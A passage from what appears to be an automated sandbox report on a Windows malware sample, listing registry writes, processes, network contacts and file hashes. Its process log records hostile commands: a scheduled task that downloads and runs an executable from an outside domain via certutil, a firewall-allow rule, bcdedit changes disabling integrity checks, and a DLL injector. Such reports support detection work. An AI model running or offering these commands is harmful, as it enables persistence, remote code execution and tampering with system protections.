| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a441400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a319000000010000001000000014c3bd3549ee225aece13734ad8ca0b82000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b80f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\rss\csrss.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe
"C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241108014118.log C:\Windows\Logs\CBS\CbsPersist_20241108014118.cab
C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe
"C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /133-133
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ninhaine.com | udp |
| US | 8.8.8.8:53 | 2makestorage.com | udp |
| US | 8.8.8.8:53 | nisdably.com | udp |
| US | 8.8.8.8:53 | 4b509c11-5cac-43da-9fd0-65fc1a64a46e.ninhaine.com | udp |
| US | 8.8.8.8:53 | server1.ninhaine.com | udp |
| CZ | 46.8.8.100:443 | server1.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server1.ninhaine.com | tcp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | ww82.ninhaine.com | udp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 92.123.241.137:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard20.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard20.blob.core.windows.net | tcp |
| CZ | 46.8.8.100:443 | server1.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | spolaect.info | udp |
| CZ | 46.8.8.100:443 | server1.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server1.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | server1.2makestorage.com | udp |
Files
memory/2008-0-0x0000000003C70000-0x00000000040AC000-memory.dmp
memory/2008-1-0x0000000003C70000-0x00000000040AC000-memory.dmp
memory/2008-2-0x00000000040B0000-0x00000000049D6000-memory.dmp
memory/2008-3-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/1748-4-0x0000000003A90000-0x0000000003ECC000-memory.dmp
memory/2008-6-0x0000000003C70000-0x00000000040AC000-memory.dmp
memory/2008-8-0x00000000040B0000-0x00000000049D6000-memory.dmp
memory/2008-5-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2008-7-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/1748-9-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1748-10-0x0000000000400000-0x00000000021A3000-memory.dmp
\Windows\rss\csrss.exe
| MD5 | 1485d115c0db789ed882e6da39b845d0 |
| SHA1 | b25ee4515f5a1a8b420e7eba38f233ee64a24755 |
| SHA256 | 036e1c48be2a9fde1e94334dcb1216eec8512b38c118234c118aaa47b6ad65c7 |
| SHA512 | c8571df02ca3c8d69c49393d45a032a291c6f5c7100564e9a1337f287abd195c903bf86a20217990de38627d2a646dc7dde0e3953827afa94db270124c1f559b |
memory/1724-19-0x0000000003B20000-0x0000000003F5C000-memory.dmp
memory/1748-21-0x0000000000400000-0x00000000021A3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 13aaafe14eb60d6a718230e82c671d57 |
| SHA1 | e039dd924d12f264521b8e689426fb7ca95a0a7b |
| SHA256 | f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3 |
| SHA512 | ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3 |
memory/2788-28-0x0000000140000000-0x00000001405E8000-memory.dmp
\Users\Admin\AppData\Local\Temp\dbghelp.dll
| MD5 | f0616fa8bc54ece07e3107057f74e4db |
| SHA1 | b33995c4f9a004b7d806c4bb36040ee844781fca |
| SHA256 | 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026 |
| SHA512 | 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c |
\Users\Admin\AppData\Local\Temp\symsrv.dll
| MD5 | 5c399d34d8dc01741269ff1f1aca7554 |
| SHA1 | e0ceed500d3cef5558f3f55d33ba9c3a709e8f55 |
| SHA256 | e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f |
| SHA512 | 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
memory/2788-42-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/1724-55-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1724-59-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1724-71-0x0000000000400000-0x00000000021A3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | fd2727132edd0b59fa33733daa11d9ef |
| SHA1 | 63e36198d90c4c2b9b09dd6786b82aba5f03d29a |
| SHA256 | 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e |
| SHA512 | 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e |
\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | fafbf2197151d5ce947872a4b0bcbe16 |
| SHA1 | a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020 |
| SHA256 | feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71 |
| SHA512 | acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6 |
\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
| MD5 | d98e78fd57db58a11f880b45bb659767 |
| SHA1 | ab70c0d3bd9103c07632eeecee9f51d198ed0e76 |
| SHA256 | 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0 |
